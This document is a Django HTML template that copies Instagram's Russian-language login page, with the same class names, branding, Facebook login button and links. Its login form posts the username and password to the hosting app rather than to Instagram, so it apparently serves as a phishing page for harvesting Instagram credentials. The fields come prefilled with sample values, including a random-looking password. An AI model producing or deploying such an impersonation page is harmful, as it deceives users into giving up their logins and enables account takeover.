{% load static %}
<!DOCTYPE html>
<html>
<head>
    {% block title %}
    <title>Instagram</title>
    {% endblock %}
     <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <link rel="stylesheet" type="text/css" href="{% static 'css/users.css' %}">
</head>
<body>

   <main class="SCxLW  o64aR " role="main">
      <article class="_4_yKc">
         <div class="yOZjD _80tAB">
            <div class="V64Sp" id="loop_image">
              <img class="RP4i1  " id="image" src="{% static 'img/0a2d3016f375.jpg' %}" alt="">
              </div>
         </div>
         <div class="rgFsT   ">
            <div class="gr27e  ">
               <h1 class="NXVPg Szr5J  coreSpriteLoggedOutWordmark  "></h1>
               <div class="EPjEi">
                  <form class="HmktE" id="loginForm" method="post">
                     <div class="            qF0y9          Igw0E     IwRSH      eGOV_         _4EzTm                                                              kEKum                                                ">
                        <div class="-MzZI">
                           <div class="_9GP1n   ">
                              <label class="f0n8F FATdn"><span class="_9nyy2">Телефон, имя пользователя или эл. адрес</span><input aria-label="Телефон, имя пользователя или эл. адрес" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="75" name="username" type="text" class="_2hvTZ pexuQ zyHYP" value="asd"></label>
                              <div class="i24fI"></div>
                           </div>
                        </div>
                        <div class="-MzZI">
                           <div class="_9GP1n   ">
                              <label class="f0n8F FATdn"><span class="_9nyy2">Пароль</span><input aria-label="Пароль" aria-required="true" autocapitalize="off" autocorrect="off" name="password" type="password" class="_2hvTZ pexuQ zyHYP" value="94qML_V+k\tQ']="></label>
                              <div class="i24fI">
                                 <div class="            qF0y9          Igw0E     IwRSH      eGOV_         _4EzTm                      soMvl                                                                                        "><button class="sqdOP yWX7d     _8A5w5    " type="button">Показать</button></div>
                              </div>
                           </div>
                        </div>
                        <div class="            qF0y9          Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    ">
                           <button class="sqdOP  L3NKy   y3zKF     " type="submit">
                              <div class="            qF0y9          Igw0E     IwRSH      eGOV_         _4EzTm                                                                                                              ">Войти</div>
                           </button>
                        </div>
                        <div class="K-1uj Z7p_S">
                           <div class="s311c"></div>
                           <div class="_0tv-g">или</div>
                           <div class="s311c"></div>
                        </div>
                        <div class="            qF0y9          Igw0E     IwRSH      eGOV_         _4EzTm    bkEs3                          CovQj                  jKUp7          DhRcB                                                    "><button class="sqdOP yWX7d    y3zKF     " type="button"><span class="fa fa-facebook coreSpriteFacebookIcon AeB99"></span><span class="KPnG0">Войти через Facebook</span></button></div>
                     </div>
                     <a class="_2Lks6" href="/accounts/password/reset/" tabindex="0">Забыли пароль?</a>
                  </form>
               </div>
            </div>
            <div class="gr27e">
               <div class="_7UhW9   xLCgt      MMzan   _0PwGv         uL8Hv         ">
                  <p class="izU2O ">У вас ещё нет аккаунта? <a href="/accounts/emailsignup/" tabindex="0"><span class="_7UhW9   xLCgt       qyrsm      gtFbE      se6yk        ">Зарегистрироваться</span></a></p>
               </div>
            </div>
            <!-- <div class="APQi1">
               <p class="b_nGN">Установите приложение.</p>
               {% comment %} <div class="iNy2T"><a class="z1VUo" href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;ct=igweb.loginPage.badge&amp;mt=8&amp;vt=lo" tabindex="0"><img alt="Доступно в Магазине приложений" class="Rt8TI " src="/static/images/appstore-install-badges/badge_ios_russian-ru.png/bfba6d0fd6bd.png"></a><a class="z1VUo" href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26ig_mid%3D6B5FCA59-3C7E-430D-9F07-D516C2C27FA0%26utm_content%3Dlo%26utm_medium%3Dbadge" tabindex="0"><img alt="Доступно в Google Play" class="Rt8TI " src="/static/images/appstore-install-badges/badge_android_russian-ru.png/4c70948c09f3.png"></a></div> {% endcomment %}
            </div> -->
         </div>
      </article>
   </main>

    <script src="{% static 'js/users.js' %}"></script> 
</body>
</html>
